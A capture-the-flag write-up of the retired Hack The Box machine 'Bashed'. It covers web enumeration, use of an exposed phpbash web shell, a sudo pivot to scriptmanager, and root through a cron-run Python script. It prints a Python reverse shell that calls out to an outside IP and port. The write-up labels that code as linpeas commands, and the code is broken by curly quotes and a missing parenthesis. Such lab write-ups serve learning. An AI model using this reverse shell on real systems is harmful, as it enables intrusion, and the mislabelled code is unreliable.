In this next phase I’ll enumerate the webpage for possible web content:

```
┌──(root💀CSEC)-[/home/cyborgbytes/Documents/Writeups/RetiredHTB]
└─# gobuster dir -u http://10.129.148.228/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

```

from this enumeration technique we were able to find a bunch of interesting information which will possibly lead us to very interesting rabbit holes or to put it in a different perspective : “ninja glory”

lets break what we found in some context:

The following web directories were found :
```

/css
/dev
/fonts
/images
/index.html
/js
/php
/server-status
/uploads
```

the most interesting web-directories I have my eyes on are the following :

```
/dev
/php
/uploads
```

lets examine those directories closer…

I found something very interesting in the dev directory,

through dev page I found interesting phpbash php files when I clicked on phpbash.php I got into a shell where I can interact with the file-systems, Surprisngly I can access and read what’s the user.txt file but not the root, so I have to find a way to get initial access anyhow.

Phase #3 : Exploitation, “Initial Access”

First we check what can be ran as sudo :

```
www-data@bashed:/tmp$ sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

```

From what I can see is that I can read user.txt in the user directory which is arrexel, lets find a way to get the user by exploring our options in this box.

since we can run sudo as scriptmanager in this machine I could try the following command to spawn as scriptmanager :

```
sudo -u scriptmanager bash

```

and there we go, here we are scriptmanager user:

Phase #5 : Finale root access!

to get root access I would run a really interesting tools that checks for possible priv esc methods, this tool is called linpeas, it’s available for windows and linux machines.

by running the following commands I could run and execute the privilege escalation script to look for possible privilege escalation vectors:

```

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“10.10.14.231”,999))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call([“/bin/sh”,”-i”]
```

By going to the script directory we can find that there is two files, test.py and test.txt, it’s basically a cronjob that is running every minute, if we edit the python file we could have a reverse shell as root because it’s owned by root

By Editing this file with the python revese shell above we could get a reverse shell successfully: